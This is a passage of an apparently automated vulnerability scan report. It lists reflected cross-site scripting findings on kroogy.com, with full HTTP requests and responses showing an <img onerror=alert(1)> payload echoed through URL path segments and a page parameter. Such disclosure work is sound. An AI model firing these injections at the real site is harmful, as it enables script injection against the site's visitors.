Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearcha288e<img src=a onerror=alert(1)>085eb934534</strong>
...[SNIP]...

5.17. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8181<img%20src%3da%20onerror%3dalert(1)>1e804ed95f7 was submitted in the REST URL parameter 1. This input was echoed as e8181<img src=a onerror=alert(1)>1e804ed95f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /indexe8181<img%20src%3da%20onerror%3dalert(1)>1e804ed95f7/livesearch&q=site&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Indexe8181<img src=a onerror=alert(1)>1e804ed95f7Controller</strong>
...[SNIP]...

5.18. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bfbe<img%20src%3da%20onerror%3dalert(1)>6d8fdcd1241 was submitted in the REST URL parameter 2. This input was echoed as 2bfbe<img src=a onerror=alert(1)>6d8fdcd1241 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearch2bfbe<img%20src%3da%20onerror%3dalert(1)>6d8fdcd1241&q=site&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearch2bfbe<img src=a onerror=alert(1)>6d8fdcd1241</strong>
...[SNIP]...

5.19. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site:&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11056<img%20src%3da%20onerror%3dalert(1)>15604bb1f75 was submitted in the REST URL parameter 1. This input was echoed as 11056<img src=a onerror=alert(1)>15604bb1f75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index11056<img%20src%3da%20onerror%3dalert(1)>15604bb1f75/livesearch&q=site:&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index11056<img src=a onerror=alert(1)>15604bb1f75Controller</strong>
...[SNIP]...

5.20. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site:&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5be1c<img%20src%3da%20onerror%3dalert(1)>192451da902 was submitted in the REST URL parameter 2. This input was echoed as 5be1c<img src=a onerror=alert(1)>192451da902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearch5be1c<img%20src%3da%20onerror%3dalert(1)>192451da902&q=site:&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearch5be1c<img src=a onerror=alert(1)>192451da902</strong>
...[SNIP]...

5.21. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90_random.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38cc5<img%20src%3da%20onerror%3dalert(1)>2e38d3282c6 was submitted in the REST URL parameter 1. This input was echoed as 38cc5<img src=a onerror=alert(1)>2e38d3282c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub38cc5<img%20src%3da%20onerror%3dalert(1)>2e38d3282c6/banner_728_90_random.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pub38cc5<img src=a onerror=alert(1)>2e38d3282c6Controller</strong>
...[SNIP]...

5.22. http://kroogy.com/search/emailafriend [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/emailafriend

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e99b4<img%20src%3da%20onerror%3dalert(1)>8b9ef66b48e was submitted in the REST URL parameter 1. This input was echoed as e99b4<img src=a onerror=alert(1)>8b9ef66b48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searche99b4<img%20src%3da%20onerror%3dalert(1)>8b9ef66b48e/emailafriend?url=http%3A%2F%2Fkroogy.com HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searche99b4<img src=a onerror=alert(1)>8b9ef66b48eController</strong>
...[SNIP]...

5.23. http://kroogy.com/search/emailafriend [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/emailafriend

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 582a0<img%20src%3da%20onerror%3dalert(1)>686409d57c8 was submitted in the REST URL parameter 2. This input was echoed as 582a0<img src=a onerror=alert(1)>686409d57c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/emailafriend582a0<img%20src%3da%20onerror%3dalert(1)>686409d57c8?url=http%3A%2F%2Fkroogy.com HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:42:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>emailafriend582a0<img src=a onerror=alert(1)>686409d57c8</strong>
...[SNIP]...

5.24. http://kroogy.com/search/images/blank.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/images/blank.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d06fa<img%20src%3da%20onerror%3dalert(1)>81d5887b4c4 was submitted in the REST URL parameter 2. This input was echoed as d06fa<img src=a onerror=alert(1)>81d5887b4c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/imagesd06fa<img%20src%3da%20onerror%3dalert(1)>81d5887b4c4/blank.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2120

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>imagesd06fa<img src=a onerror=alert(1)>81d5887b4c4</strong>
...[SNIP]...

5.25. http://kroogy.com/search/index.php [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/index.php

Issue detail

The value of the page request parameter is copied into the HTML document as plain text between tags. The payload 8db35<img%20src%3da%20onerror%3dalert(1)>223a12c50e6 was submitted in the page parameter. This input was echoed as 8db35<img src=a onerror=alert(1)>223a12c50e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/index.php?page=search/redir8db35<img%20src%3da%20onerror%3dalert(1)>223a12c50e6&type=news&search=site:xss.cx HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:37:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2119

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>redir8db35<img src=a onerror=alert(1)>223a12c50e6</strong>
...[SNIP]...

5.26. http://kroogy.com/search/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/news

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bef17<img%20src%3da%20onerror%3dalert(1)>1a3c051fc03 was submitted in the REST URL parameter 1. This input was echoed as bef17<img src=a onerror=alert(1)>1a3c051fc03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchbef17<img%20src%3da%20onerror%3dalert(1)>1a3c051fc03/news?search=site%3Axss.cx&type=news&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:42:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchbef17<img src=a onerror=alert(1)>1a3c051fc03Controller</strong>
...[SNIP]...

5.27. http://kroogy.com/search/news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/news

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d34d<img%20src%3da%20onerror%3dalert(1)>c809307336 was submitted in the REST URL parameter 2. This input was echoed as 4d34d<img src=a onerror=alert(1)>c809307336 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/news4d34d<img%20src%3da%20onerror%3dalert(1)>c809307336?search=site%3Axss.cx&type=news&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:43:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>news4d34d<img src=a onerror=alert(1)>c809307336</strong>
...[SNIP]...

5.28. http://kroogy.com/search/noresults [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/noresults

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b56e<img%20src%3da%20onerror%3dalert(1)>023dea34fef was submitted in the REST URL parameter 1. This input was echoed as 7b56e<img src=a onerror=alert(1)>023dea34fef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search7b56e<img%20src%3da%20onerror%3dalert(1)>023dea34fef/noresults?search=site:xss.cx&type=news HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search7b56e<img src=a onerror=alert(1)>023dea34fefController</strong>
...[SNIP]...

5.29. http://kroogy.com/search/noresults [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/noresults

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf205<img%20src%3da%20onerror%3dalert(1)>b24b05ec673 was submitted in the REST URL parameter 2. This input was echoed as bf205<img src=a onerror=alert(1)>b24b05ec673 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/noresultsbf205<img%20src%3da%20onerror%3dalert(1)>b24b05ec673?search=site:xss.cx&type=news HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2123

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>noresultsbf205<img src=a onerror=alert(1)>b24b05ec673</strong>
...[SNIP]...

5.30. http://kroogy.com/search/random.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/random.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 898ad<img%20src%3da%20onerror%3dalert(1)>372477569b5 was submitted in the REST URL parameter 1. This input was echoed as 898ad<img src=a onerror=alert(1)>372477569b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search898ad<img%20src%3da%20onerror%3dalert(1)>372477569b5/random.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/emailafriend?url=http%3A%2F%2Fkroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.6.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:40:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search898ad<img src=a onerror=alert(1)>372477569b5Controller</strong>
...[SNIP]...

5.31. http://kroogy.com/search/random.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/random.php

Issue detail

